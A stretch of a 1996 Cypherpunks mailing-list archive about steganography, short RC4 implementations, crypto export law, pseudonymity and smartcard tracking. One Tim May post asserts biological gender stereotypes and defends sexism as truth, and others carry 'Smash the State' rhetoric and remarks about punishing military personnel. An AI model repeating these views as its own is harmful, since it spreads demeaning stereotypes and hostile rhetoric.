Content-Type: text/plain


At 3:30 AM 11/9/1996, Adam Back wrote:
>Peter Hendrickson <ph@netcom.com> writes:
>> Where will you keep your secret key?  Remember, when they go through
>> your house they bring 20 young graduates from MIT who are just dying
>> to show how clever they are and save the world at the same time.

> Keep your secret key in your head.

I think this is hard to do in practice.  I have tried.

>>> This is the essence of steganography and the nature of signal and
>>> noise are fundemental principles of information theory.
>>
>> The concept of noise is not all that well defined, however.  There
>> is no way to look at a signal and say "this is all noise."
>> Sometimes physical theories may lead you to believe that it is all
>> noise.  That is fine for many applications, but when becomes less
>> convinced of things if the consequences are severe.

> Your plausible deniability has to get quite low before it will stand
> up as "proof" in court.

(This goes under 3.1 or 3.2 of my outline, which you may not have received yet.)

My idea is that the lack of noise is used as evidence to get a search
warrant.  The search warrant is used to get the evidence to put you away
forever.

(This goes under 3.3 of the outline.)

The severe penalties and significant chance of capture will keep the number
of cryptoanarchists low.

> Your real challenge is keeping your stego programs safe.  Boot
> strapping a stegoed encrypted file system while leaving no stego code
> lying around isn't that easy.

Excellent point, especially since you don't have an encrypted virtual
disk.  Can anybody resolve this?

>>>> If you are not doing it by hand, you own terrorist software and will pay
>>>> the price.

>>> Ah yes, terrorist programs like cat and perl and operating systems like
>>> Linux which contain a loopback filesystem that I can hook a perl
>>> interpreter into at compile-time (which is enough for me to rewrite the
>>> program from scratch each time if necessary, unless things like math
>>> libraries are also outlawed on computers :)  I think that the crypto
>>> concentration camps are going to be very crowded places.

>> Can you elaborate on this?  I am curious to know exactly what you are going
>> to keep in your head and what goes on the disk.  Please post the Perl
>> code that you would type in from scratch every time.

> My specialty :-)

> rc4 in C:

> #define S,t=s[i],s[i]=s[j],s[j]=t /* rc4 key <file */
> unsigned char s[256],i,j,t;main(c,v)char**v;{++v;while
> (s[++i]=i);while(j+=s[i]+(*v)[i%strlen(*v)]S,++i);for(
> j=0;c=~getchar();putchar(~c^s[t+=s[i]]))j+=s[++i]S;}

> rc4 in perl:

> #!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
> @k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
> ]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
> &S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}

(Under 3.3)  I would have a hard time memorizing these programs.  This
pretty much guarantees that the number of cryptoanarchists will be small.

(I am deeply envious of your legal right to post this code, however.
Now, why was it that we broke away from the Mother Country?)

I would like to see a longer exposition of your approach.  Given
a hostile environment, how would I operate a small anonymous perl
coding service using your techniques?  Don't forget to tell me how
I get paid and when I get to spend my "ill-gotten" gains and how
nobody will notice that I am doing it.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sat, 9 Nov 1996 09:45:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Black Unicorn exposed?
Message-ID: <v02140b03aeaa71ed1c84@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...

Black Unicorn recently stated that had taken measures to shield
his identity so that people would be unable to cause harm to
his professional activities by making unsubstantiated claims
that could scare off prospective clients.

It appears now that this protection has evaporated.  It will not
be very hard in the future to put this information together with
other statements people may make about Mr. Unicorn.

We are hardly operating in a hostile environment.  Yet, somebody
who has apparently gone to some effort to have an anonymous
identity has been exposed.  The implications of this are worth
considering.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:04:15 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Excusing Judges for Knowing Too Much
In-Reply-To: <v02140b16aea92ba9feaf@[192.0.2.1]>
Message-ID: <3284C45B.6B0C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> At 9:54 AM 11/8/1996, Timothy C. May wrote:
> >At 8:20 AM -0500 11/8/96, Jim Ray wrote:
> >> been decided and appealed, because of this very possibility. I am already
> >> concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt
> >> to argue that "cypherpunk terrorists have been secretly trying to subtly
> >> influence Kozinski's thinking, and that therefore he should be removed from
> >> the case in favor of some judge who has no clue whatsoever about the 'Net,
> >> encryption, anonymous remailers, etc." [I am sure the argument wouldn't be
> >> put quite that way <g> but that's what the U.S. Attorney would mean.] There
> >> is now a judge with some idea of these issues who will IMNSHO probably be
> >> fair to "our" side. It is a rare opportunity, and I don't want to "blow it."

So how do you get a fair trial on a controversial issue?  I'm asking this seriously.

In the O.J. case, if the "evidence" followed standards and weren't tainted, and they
didn't have a racist psycho like Fuhrman all over the case, and neo-Nazis over at
Cedars-Sinai collecting O.J.'s blood, then we wouldn't have so much controversy.

But the "mass majority" decided he was guilty anyway, damn the evidence or how it was
collected, or what that could mean if you or I were framed, so, take a look around at
cypherpunks, and how they disagree widely on issues, and ask yourself how you could
get a fair trial from a cypherpunks jury.

But the jury system is still *much* better than judges only, as long as the jury isn't
stacked.  For example, the new O.J. jury is nearly all white, and since that particular
venue requires only a majority (not unanimous) decision, the jury is defacto all white,
which is tantamount to a lynching.

So how do you prescribe fair jury selection?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 9 Nov 1996 10:06:51 -0800 (PST)
To: jleonard@divcom.umop-ap.com (Jon Leonard)
Subject: Re: WebTV a "munition"
In-Reply-To: <9611082146.AA25405@divcom.umop-ap.com>
Message-ID: <199611091806.KAA00144@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Jon Leonard writes:
> 
> Eric Murray wrote:
> [Stuff about WebTv/crypto/export problems]
> > So what's the story here?  It's a web browser, so they're
> > probably talking about SSL.  SSL (both versions) already has mechanisims for
> > allowing "export" level encryption, and although you still need to
> > get a Commodities Jurisdiction, it's been done before so it
> > shouldn't be too difficult.  If they didn't use the "export"
> > level SSL CipherTypes, then what're they up to?  Are they
> > fighting crypto export laws (for which they should be congratulated
> > and supported) or are they just looking for free publicity?
> 
> I'm not sure they're doing either.  When I talked to my friends at WebTv,
> I got the impression that they thought a functional browser needed to have
> support for electronic commerce.  This electronic commerce needs crypto,
> and if you're going to do crypto right, it has to be strong crypto.


Right.  But if you're doing SSL, you _have_ to know about the
export issues!  It's all over the sources, specs, docs etc etc.
It's almost implssible to be 'clueless' about this if you
have implemented SSL or even looked seriously at doing it.

So if their point is to fight against ITAR (one interpretation of
the facts as I know them) why haven't they announced that they're doing so?
It would be good PR.

 

> Given that they've tried to do everything else right (and, in my opinion,
> succeeded), that may be all there is to it.
> 
> I'll ask for more details next time I talk to them.


That'd be cool.  I think that there's a lot that we don't know about this.

The web site doesn't have much hard info, just a lot of
buzzword-compliant marketing bullstuff and the highest ratio of
(TM)s to words that I have ever seen.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 9 Nov 1996 10:24:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Announcement] Cypherpunks Shooting Club
In-Reply-To: <Pine.3.89.9611082125.A13815-0100000@netcom9>
Message-ID: <199611091824.KAA29058@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


 shamrock@netcom.com wrote to All:

 s> By popular request, I am following up on the three year old idea of
 s> the Cypherpunks Shooting Club.

OK, so who's doing the t-shirt?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Sat, 9 Nov 1996 07:46:20 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [Announcement] Cypherpunks Shooting Club
Message-ID: <2.2.32.19961109154623.0069854c@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 PM 11/8/96 -0800, you wrote:
:By popular request, I am following up on the three year old idea of the 
:Cypherpunks Shooting Club.
:
:Bring your own firearm or use one of the ones provided.

:-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred

How timely, especially after (or during) Flame Wars--96!

How are targets to be determined, by lot?

Cordially,

Alec                   

PGP Fingerprint:

pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 9 Nov 1996 10:49:32 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
Message-ID: <1.5.4.32.19961109184728.005bbe40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:29 AM 11/9/96 -0800, John Gilmore <gnu@toad.com> wrote:
>I'm sending you this message because you might be interested in
>helping to build or test or document, or teach about, my S/WAN project
>to secure 5% of the net by Christmas.
>
>There is now a public mailing list which you can join to find out
>what's happening in the project, get the latest software for testing,
>ask questions, etc.  To join the list, send mail to:
>	linux-ipsec-REQUEST@clinet.fi
>The email should contain a single line that just says:
>	subscribe

Actually, it needs to say
        subscribe linux-ipsec


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 Nov 1996 07:49:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why Crypto Is Hard
Message-ID: <1.5.4.32.19961109154744.006c82e0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce asks his Risk post not be distributed on the Web. Okay.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 10:46:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: His and Her Anarchies
In-Reply-To: <9610088475.AA847508443@smtplink.alis.ca>
Message-ID: <v03007801aeaa7e5d06d0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:59 PM -0500 11/8/96, jbugden@smtplink.alis.ca wrote:

>I think it relates to crypto policy via policy in general, also to both the
>libertarian and the inevitable cryptoanarchy argument we are currently tossing
>about and brought to mind a comment a few months back from Tim about how the
>occasional female members of this list tended to not make sense a lot of the
>time.

Well, I think there clearly _is_ a gender gap on these sorts of issues.
While we certainly have a handful of women subscribers, we have few active
women posters, and none of the "ringleaders" are women.

The woman I am currently seeing is a case in point. She occasionally wants
to hear what interests me, in my "other life," and I have tried to explain
the stuff we talk about here.

Her first reaction was fear, that my life and/or liberty is in jeopardy.
(She started out as a liberal/socialist, but is now more
conservative/libertarian. And the images of Waco burning leave her with
little sympathy for Reno's Raiders and the government goons who burned 80
people because Koresh was Practicing a Religion without a License. But it
makes her want to _avoid_ Reno, Clinton, Freeh, and other such goons at all
costs, not wave a red flag in front of them.)

She wondered to me why I have not been arrested. I asked "And just what
specific laws have I violated?" She couldn't say, and she acknowledged that
Americans are pretty much free to speak their mind, but she felt that the
FBI and Janet Reno _must_ fear and dislike what Cypherpunks are doing. I
agreed.

And as she hears more about what cryptography implies, what it means for
bypassing the usual tax collection and behavior control mechanisms of the
modern state, the more worried she gets.

I suspect there may be a biological component to this. Many males enjoy
adrenaline rushes, whether by bungee cord jumping, robbing houses, or
plotting to smash the state. Many females have _other_ interests. Women I
have known have generally not understood why I would be willing to be so
upfront about my radical views and why I am apparently willing to "risk it
all" for the adrenaline rush of being involved in this battle.

(And saying I am "prepared," and pointing to the loaded .45 I keep in case
the Midnight Raiders hit my house is even less reassuring to them! In at
least one case I never saw the woman again. Rationally, I can't say I
disagree with their reaction, from a payoff matrix standpoint. But
something in we males craves this kind of confrontation. The leaders of the
revolutions in the past were almost always me. The Feminist/Abortion battle
is different, for some pretty obvious reasons, but most revolutions are led
by men. Not altogether surprising.)

So, I'm not surprised that so few women are on the list. For one thing,
it's about computers, and the Net is overwhelmingly male (though the
statistics are changing). Second, it's basically about libertarian politics
(some may disagree, but I stand by this). This cuts the female interest
again. Third, it's "radical and dangerous." Fourth, the list is made up of
a lot of "alpha males" debating and arguing, and is not a "nurturing,
wimmin-friendly, caring environment," such as some of the women-only forums
advertise.

This may sound sexist. But sexism, like other "isms," is often based on
plain old truth, however politically incorrect it may be to some.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Bostick <abostick@netcom.com>
Date: Sat, 9 Nov 1996 10:56:54 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <Pine.3.89.9611091020.A20414-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 9 Nov 1996, Peter Hendrickson wrote:

> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> 
> Black Unicorn recently stated that had taken measures to shield
> his identity so that people would be unable to cause harm to
> his professional activities by making unsubstantiated claims
> that could scare off prospective clients.
> 
> It appears now that this protection has evaporated.  It will not
> be very hard in the future to put this information together with
> other statements people may make about Mr. Unicorn.
> 
> We are hardly operating in a hostile environment.  Yet, somebody
> who has apparently gone to some effort to have an anonymous
> identity has been exposed.  The implications of this are worth
> considering.

Do you have any reason to believe that S. L. von Bernhardt is Uni's
real name?

Alan Bostick               | You know those chemicals women have in them,
                           | when they've got PMS? Well, men have those very
mailto:abostick@netcom.com | same chemicals in them *all the time*.
news:alt.grelb             |           Margaret Atwood, THE ROBBER BRIDE
http://www.alumni.caltech.edu/~abostick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 10:55:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <v03007802aeaa83af46f1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 AM -0800 11/9/96, Peter Hendrickson wrote:
>At 11:00 AM 11/9/1996, Robert Hettinga wrote:
>> S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
>
>Black Unicorn recently stated that had taken measures to shield
>his identity so that people would be unable to cause harm to
>his professional activities by making unsubstantiated claims
>that could scare off prospective clients.
>
>It appears now that this protection has evaporated.  It will not
>be very hard in the future to put this information together with
>other statements people may make about Mr. Unicorn.
>
>We are hardly operating in a hostile environment.  Yet, somebody
>who has apparently gone to some effort to have an anonymous
>identity has been exposed.  The implications of this are worth
>considering.


Careful about the passive construction "was exposed." I took the
announcement, presumably based on his summary to R. Hettinga, and
containing biographical information which he presumably supplied, to be an
active decision by him to "come out of the closet."

Exactly as you did, Peter, by breaking your silence of many months (based
on your fears of a pogrom, as you admitted) and suddenly posting a large
number of posts in one day. It would be misleading for us to say "Peter
Hendrickson was exposed." You exposed yourself. As did S, L. vonBernhardt.

Ditto for Lucky Green, who has revealed his True Name to various of us, and
whose True Name could probably be deduced by anyone by spending a few
minutes with Deja News or Alta Vista.

--Tim May (not his real name)

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 9 Nov 1996 08:17:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: DCSB: Money Laundering -- The Headless Horseman of the Infocalypse
Message-ID: <v03007822aeaa5af8a26e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----



                 The Digital Commerce Society of Boston

                              Presents
                           "Black Unicorn"

                         "Money Laundering --
               The Headless Horseman of the Infocalypse"



                        Tuesday, December 3, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


S. L. vonBernhardt, <mailto:unicorn@schloss.li>, is an attorney, a member
of the board of directors of two European financial institutions, author
of "Practical and Legal Problems Confronting the Asset Concealer in
Relation to Offshore Financial and Corporate Entities" and a former
member of the intelligence community.  He is currently working to develop
and preserve institutions dedicated to traditional standards of financial
privacy.


One of the most disturbing products of the "war on drugs" has been the
effective criminalization of many forms of formerly legal financial
transactions.  The resulting legislation places serious burdens on
financial institutions in the form of "due diligence" requirements, as
well as building what can be an inflexible barrier before those who would
implement uncompromised digital commerce systems.  Mr. vonBernhardt will
address the legislative burdens imposed on financial institutions, the
likely impact on future systems of digital commerce, potential solutions
through regulatory arbitrage, and the practical problems facing
jurisdictions seeking to enforce regulations in the face of advanced
systems of digital commerce.

No cameras, please.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, December 3, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, November 30, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 January    Rodney Thayer    Applying PGP To Digital Commerce
 February   David Kaufman    1996 in Review / Predictions for 1997

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston




-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b4 e22

iQCVAwUBMoSp3PgyLN8bw6ZVAQFaqgP/XPH82Z2EcgEpIQ0V2YiySW7Zlh/mYcxz
xxoYtwVg5YwYmdlT7ueqFwRyzf/KfI4/MbLSj1NB+pDh2yEpZlokIo+u0qJPfYgT
aP/bQg7fKOJ3iwrQUTlJuuxhM2TlUcqSlZXymgvvq/VZnq6uygT2GSC/OxMBTGrg
aUq8cXlnNaI=
=U4Mr
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 9 Nov 1996 11:09:08 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.961109105609.24037A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 9 Nov 1996, Peter Hendrickson wrote:

> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> 
> Black Unicorn recently stated that had taken measures to shield
> his identity...
> 
> It appears now that this protection has evaporated...

Appearances can be deceptive.


 S a n d y

"Scholars have discovered that the /Illiad/ and the /Odyssey/ 
were not actually written by Homer, but by another ancient Greek 
who had the same name."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 11:05:55 -0800 (PST)
To: YoungSik Jeong <Cypherpunks@toad.com
Subject: Re: No More
In-Reply-To: <2.2.32.19961108235312.00681fcc@cnct.com>
Message-ID: <v03007803aeaa87221656@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM -0500 11/8/96, YoungSik Jeong wrote:
>I want take off mail list

I suscrive you not.

But case you understand not, follow are instructions. You read, OK?




To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 9 Nov 1996 08:10:56 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: WebTV a "munition"
In-Reply-To: <3283A25B.1D6E@ix.netcom.com>
Message-ID: <199611091610.LAA00420@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves writes:

: Eric Murray wrote:
: > 
: > Page 3 of the San Jose Mercury News has a small blurb
: > about WebTV's browser/set-top box that "uses
: > computer-security technology so powerful that the
: > government is classifying it as a weapon
: > that will require a special export license before
: > it can be sold overseas".[...]
: > shouldn't be too difficult.  If they didn't use the "export"
: > level SSL CipherTypes, then what're they up to?  Are they
: > fighting crypto export laws (for which they should be congratulated
: > and supported) or are they just looking for free publicity?
: 
: Based on the lack of public policy pronouncements from the WebTV folks, 
: I would answer C) They're clueless. I'm not sure that management even 
: understood, or wanted to understand, that they'd have an export problem.
: See http://www.webtv.net/

But note that both their licensees, Sony and Philips, are foreign
companies.  Presumably they will just manufacture the boxes outside
the U.S. when they want to market them outside the U.S.

As far as I know, the only person convicted of shipping cryptographic
devices outside the U.S. without a license was guilty of shipping a
satellite TV descrambler to Latin America.  So there is some sort of
precedent.  (And, of course, no First Amendment problem.)

But there is a big question as to whether WebTV violated the ITAR by
transfering cryptographic _information_ to the licensees.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 9 Nov 1996 09:17:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pseudo-law on the list and libel (fwd)
Message-ID: <199611091721.LAA00907@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> > >This opens up the potential, for example, for Tim May to sue the operator of
> > >the Cypherpunks mailing list now for posts from users (even anonymous ones)
> > >which defame or otherwise liable his character, reputation, or ability to
> > >pursue income in his chosen field. In short the operators of the list
> > >becomes publishers and distributors of the material. It is the legal
> > >difference between a bookstore and a book publisher.
> 
> There is a very distinct difference between ejecting disruptive influences
> and conducting one's self as a publisher and distributer.

Exactly. Because the list takes in submissions from ALL parties and then
resubmits them to ALL SUBSCRIBED parties it qualifies as a publisher. 

The real issue here is that folks on the net want the protection of the 1st
Amendment but they don't want the responsibility that goes along with it.
This list qualifies as a press. As a result it has a responsibility relating
to what it distributes.

Vulis was unpopular he was not distruptive. At NO time did he interfere with
the normal operation of the list software or prevent submissions or
remailings.

> > Pseudo-law on this list is really getting out of hand.
> 
> We need more lawyers.  That should replace the pseudo-law with real law.

We need fewer lawyers and better laws. Most pseudo-law is practiced by lawyers.


                                               Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 11:19:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Movement Tracking Systems and Smartcards
In-Reply-To: <9610088475.AA847507822@smtplink.alis.ca>
Message-ID: <v03007804aeaa87c23bec@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:49 PM -0500 11/8/96, jbugden@smtplink.alis.ca wrote:
>Marshall Clow <mclow@owl.csusm.edu> wrote:
>>James wrote:
>>>Of course, not having a card may subject you to greater scrutiny at check-in
>>>time due to the reduced tracking ability.
>>>
>>I think that you have this backwards. There will be less tracking ability for
>>people flying w/o tickets.
>
>Less tracking for people w/o tickets, but more scrutiny for people w/o smart
>cards.
>
>I can easily see the working assumption that smart carded people have
>_already_
>passed the security check, while those who pay cash would be under greater
>scrutiny.

This is a very relevant, on-topic issue (I've changed the thread name from
"Smart Bombs," as I didn't see the reason for it).

One of the things Chaum warned about was not this particular example, but
the dangers of having computerized checkpoints for so many things. And a
pre-authorized smartcard for getting on planes is certainly a computerized
checkpoint.

(Want to be the information is eventually fed into government computers,
for tracking movements? It's not paranoid to think they want to track _me_,
for example; rather, it's natural for _all_ airline reservation and
boarding list records to be forwarded for crunching and for correlation
analysis. It's what I would do if I ran the intelligence agencies and was
tasked with the job of having such correlation information available for
helping to solve crimes. I expect the Big Three of credit-reporting
agencies are of course also in the loop....those movies where someone is
located because they foolishly used an ATM machine to get some cash or used
their credit card are not just fiction.)

A system wherein people flash pre-approved cards (with some biometric
elements, it seems must be necessary) could easily lead to even wider use.
Toll roads are an obvious example, long-considered by Chaum and other
privacy workers.

This could be the modern equivalent of travel documents in the U.S. While I
cannot see a situation in which citizen-units are ever told they may not
travel without authorization, I can quite easily see the situation emerging
in which airlines, bus companies, car rental agencies, and even hotels and
gas stations are expected to "run your card through." This is already the
case with many hotels and nearly all car rental agencies demanding credit
cards (as we have discussed here recently), and expect this use to grow.

This de facto produces a movement tracking system. Obviously.

Expect more scrutiny, perhaps even time-consuming and hassling scrutiny,
for those who try to pay in cash and for those who are reluctant to run
their cards through the system.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 11:40:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: allow me to state the obvious....
In-Reply-To: <9610098475.AA847591051@smtp-gw.cv62.navy.mil>
Message-ID: <v03007805aeaa8b2a08c2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 PM -0500 11/9/96, SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:
>i am your average joe who uses the computer for work and e-mail and the
>occasional jaunt into the internet. going along reading this whole
>crypto-anarchy thing makes me want to cry. the whole point of cryptography
...

Well, then don't read what we have to say. Unsubscribe from the list or use
filters. That you are happy just to use your computer for work and e-mail
and occasional jaunts into the Internet and that discussions of other
topics bother you should be a clear indication you're probably on the wrong
list.

Having a "navy.mil" domain probably is another reason, unless you are only
hear to monitor our discussions of using cryptography to undermine the
state, to liberate military secrets with BlackNet and the Information
Liberation Front, and to punish the millions of those in the
military-industrial complex who have so richly earned their eventual
punishments.

Smash the State.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
